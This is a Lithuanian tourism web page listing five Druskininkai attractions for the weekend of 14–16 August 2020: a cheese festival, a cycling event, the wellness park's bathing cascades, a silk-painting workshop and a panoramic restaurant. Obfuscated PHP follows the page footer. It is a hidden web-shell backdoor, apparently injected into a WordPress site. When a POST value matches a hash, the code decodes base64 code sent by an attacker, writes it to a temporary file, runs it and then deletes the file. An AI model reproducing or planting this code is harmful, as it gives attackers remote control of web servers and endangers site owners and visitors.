fbpx
A A
A A

Druskininkų savaitgalio TOP5 (08.14-08.16) + video

2020.08.13

Atrasti Druskininkus naujai jums padės rugpjūčio 14–rugpjūčio 16 d. savaitgalio gidas #TOP5Druskininkai.

SŪRIŲ FESTIVALIS

Į ŽOLINES SU DVIRAČIU

SVEIKATINGUMO PARKO KASKADOS

MENŲ KALVĖ

KETURIŲ VĖJŲ RESTORANAS

Kitas

SŪRIŲ FESTIVALIS

Rugpjūčio mėnesį Druskininkų Pramogų aikštėje tradiciškai organizuojamas Sūrių festivalis, kuriame dalyvauja sūrio gamintojai iš Lietuvos, Latvijos ir Lenkijos. Festivalio metu vyksta parodomoji sūrio gamyba, degustacijos ir konkursai, galima įsigyti aukščiausios rūšies sūrio produktų. Šiuo metu festivalyje apsilanko per penkis tūkstančius dalyvių, ir kiekvienais metais jų skaičius auga.

Septintasis „Sūrių Festivalis” šeštadienį sukvies smulkiuosius sūrininkus iš Lietuvos, Latvijos ir Lenkijos pasidalinti savo kuriamais nuostabiais skoniais.

Druskininkų arterija – Vilniaus alėja – šurmuliuos ir kvies paragauti pačių įvairiausių ir gurmaniškiausių sūrių.

Renginio programa ir daugiau informacijos.

 

 

Kitas

Į ŽOLINES SU DVIRAČIU

Savaitgalį keliauk į Žolines Stračiūnuose su dviračiu!

Pilna renginio programa: https://bit.ly/3fQWClW

 

Kitas

SVEIKATINGUMO PARKO KASKADOS

K. Dineikos sveikatingumo parkas didžiuojasi turininga istorija – gydomąją ir fizinę kultūrą derindami su gamtiniais veiksniais, parko specialistai sulaukė plataus pripažinimo. Ilgamečių tradicijų suformuotą unikalią gydymo metodiką, kurios pagrindas yra saulės, oro, vandens procedūros, mankšta ir teigiamos emocijos, galima išmėginti ir šiandien. Pačiame sveikatingumo parko viduryje, netoli apvalios parko aikštės, Ratnyčėlės pakrantėje jūsų lauks saulės, oro, vandens procedūrų ir mankštos harmonija – unikali gydymo metodika jums ir jūsų artimiesiems.  Saulės vonios su gultais terasoje, aerojonoterapinis paviljonas, vaistažolių arbata, kaskadinės maudyklės, pirtis – jei norisi tikros atgaivos gamtos prieglobstyje, rekomenduojame apsilankyti.

Darbo laikas – I–VII, 11–22 val. Daugiau informacijos 8 612 02681. Kaina – 5 EUR.

 

Kitas

PANORAMINIS RESTORANAS „KETURI VĖJAI“

Skaniausias laikas – arčiau debesų.

Kas gali būti nuostabiau už romantišką vakarienę padebesiuose? Viešbučio „Lietuva“ 8-ajame aukšte įsikūrusiame vieninteliame kurorte panoraminiame restorane „Keturi vėjai“ išgyvensite nepakartojamas akimirkas, grožėdamiesi kvapą gniaužiančiais Druskininkų pušynų vaizdais ir skanaudami išskirtinius patiekalus.

MENIU

NUORODOS

AdresasV. Kudirkos g. 45, Druskininkai 66120.

Kitas

MENŲ KALVĖ

Šilkas – apgaubia ir šildo
Šilkas – ramina ir atpalaiduoja
Šilkas – įtraukia ir užburia

Keturios dienos su jo didenybe ŠILKU – pirmą kartą Druskininkuose rengiamame plenere „Šilko fiesta“.

Tapybos ant šilko profesionalų kūrybos procesas iš arti.

Sukurti kūriniai bendroje dalyvių parodoje „Menų kalvėje“, vėliau ir Dzūkijos regione.

Atviros šilko tapybos dirbtuvės bendruomenei ir miesto svečiams – šilko tapybos technikos ir subtilybės – profesionalų patirtis bei patarimai – Rūta Burbulė, Lina Vaišnytė, Eglė Lipinskaitė, Zita Rutkauskienė, Jolita Gylienė.

Susitikime Druskininkų amatų centre „Menų kalvė“ rugpjūčio  11-14 dienomis.

 

Tai tik dalis to, ką siūlo Druskininkų kurortas. Savaitgalį atrask Druskininkus naujai. Papasakok apie savo #Top5Druskininkai, rašyk information@druskininkai.lt ar Facebook‘e.

SŪRIŲ FESTIVALIS

Į ŽOLINES SU DVIRAČIU

SVEIKATINGUMO PARKO KASKADOS

MENŲ KALVĖ

KETURIŲ VĖJŲ RESTORANAS

Visit Druskininkai
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}